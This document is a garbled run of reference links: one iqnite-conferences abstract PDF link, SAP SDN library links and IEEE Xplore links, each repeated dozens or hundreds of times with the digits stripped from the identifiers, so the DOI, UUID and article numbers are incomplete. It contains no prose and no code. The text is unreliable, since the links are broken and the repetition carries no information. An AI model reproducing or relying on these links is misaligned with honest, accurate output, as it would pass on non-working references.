http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://dx.doi.org/ . /hicss. . http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= 